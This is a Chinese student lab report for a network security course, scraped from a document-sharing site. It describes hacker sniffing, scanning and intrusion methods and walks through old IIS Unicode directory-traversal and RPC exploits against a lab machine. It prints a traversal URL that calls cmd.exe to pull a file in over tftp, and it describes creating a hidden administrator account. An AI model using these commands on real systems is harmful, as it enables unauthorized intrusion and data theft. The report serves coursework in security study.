- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
大连外国语大学软件学院
成绩评定:《网络安全技术》
成绩评定:
专业: 信息管理与信息系统 年级: 13 班级: 21 姓名:洪泽熙 学号: 2124
黑客常用网络侦听、网络扫描、网络入侵方法简介
常用的网络侦听方法:网络监听是一种监视网络状态、数据流程以及网络上信息传输的工具,它可以将网络界面设定成监听模式,并且可以截获网络上所传输的信息。也就是说,当黑客登录网络主机并取得超级用户权限后,若要登录其它主机,使用网络监听便可以有效地截获网络上的数据,这是黑客使用最好的方法。但是网络监听只能应用于连接同网段的主机,通常被用来获取用户密码等。一般常用Sniffer工具和其他的监听器。
常用的网络入侵方法:利用木马程序,黑客通过上一次攻击留下的后门,解码器,扫描器,通过扫描某一网段的机器,破解其具有管理员权限的密码等。
常用的网络扫描方法:X—scan,字典生成,Fluxay Senior等等。
第一种入侵方法
2.1 方法原理(介绍第一种采用什么方法入侵对方系统)
Unicode漏洞入侵
2.2 入侵过程(描述入侵的操作过程,配截图详细介绍)
第一步现将需要使用的软件tftp打开,会自动出现目前的IP地址,如下图所示。
通过指令 10/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+09+get+idq.dll
来实现将idq文件发送到目标机110当中,发送成功效果如下图
发送成功,我们需要检验一下,运用dir指令来看看是否真的成功。
如上图所示,发送成功之后,我们将下一步需要使用的软件打开,ispc,先将它拷C盘根目录
拷到C盘之后,打开DOS命令面板,执行程序
执行成功之后会有如上图所示的wegotit字样
最后只需要通过IPconfig指令来查看就可以了,这次入侵结束
2.3 入侵结果(成功侵入对方系统之后,黑客可以做什么)
黑客可以建立自己的在目标主机的具有管理权限的用户,也可以删除目标主机的用户,参看开放端口等
第二种入侵方法
3.1 方法原理(介绍第二种采用什么方法入侵对方系统)
Unicode漏洞入侵攻击
3.2 入侵过程(描述入侵的操作过程,配截图详细介绍)
首先我们需要使用X-scan这个软件,将它打开,设置其检测范围。
然后再设置其需要扫描的漏洞。
一切设置好之后,我们将开始运行,等待扫描结果
扫描出来的漏洞很多,我们只用其中的一个就可以了,例如/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir 。我们可以通过这个漏洞,来查看目标机的操作系统,利用boot.ini,实现效果如下图所示。
如上图,这阳,一次入侵就结束了。
3.3 入侵结果(侵入对方系统之后,黑客可以做什么)
只要扫描出来漏洞就可以有很多种操作,查看对方操作系统只是一种,还可以参看对方C盘目录,删除主页等。
第三种入侵方法
4.1 方法原理(介绍第三种采用什么方法入侵对方系统)
RPC漏洞攻击
4.2 入侵过程(描述入侵的操作过程,配截图详细介绍)
把所需要的三种程序拷贝一下。然后打开DOS命令,用scanms 扫描其漏洞。
扫描出漏洞之后,在使用attack进行攻击
攻击完成之后可以看到会创建一个具有管理员权限的账户qing10.
为了不被对方管理员发现,我们还需要openrpcss软件,补上,以免被发现。结果如上图所示。
之后我们就可通过在我的电脑,输入对方IP地址登录了,必要情况下,需要使用刚才的账户密码。
4.3 入侵结果
在登录对方的C盘之后,可以直接拷贝,复制,创建自己所需的东西。
结论
5.1网络安全危机(总结黑客网络侦听、网络扫描、网络入侵及隐身等对网络安全带来的影响)会是整个社会造成不可避免的麻烦,差生社会舆论,致使社会动荡,对个人和企业都会有所影响。如果涉及金钱,会触发经济危机的问题。
5.2 网络安全防范措施(根据所学课程内容,结合个人及未来工作实际,提出切实可行的安全防范措施)
(1)增加安全意识
杜绝病毒,主观能动性起到很重要的作用。病毒的蔓延,经常是由于企业内部员工对病毒的传播方式不够了解,病毒传播的渠道有很多种,可通过网络、 物理介质等。查杀病毒,首先要知道病毒到底是什么,它的危害是怎么样的,知道了病毒危害性,提高了安全意识,杜绝毒瘤的战役就已经 成功了一半。平时,企业要从加强安全意识着手,对日常工作中隐藏的病毒危害增加警觉性,
文档评论(0)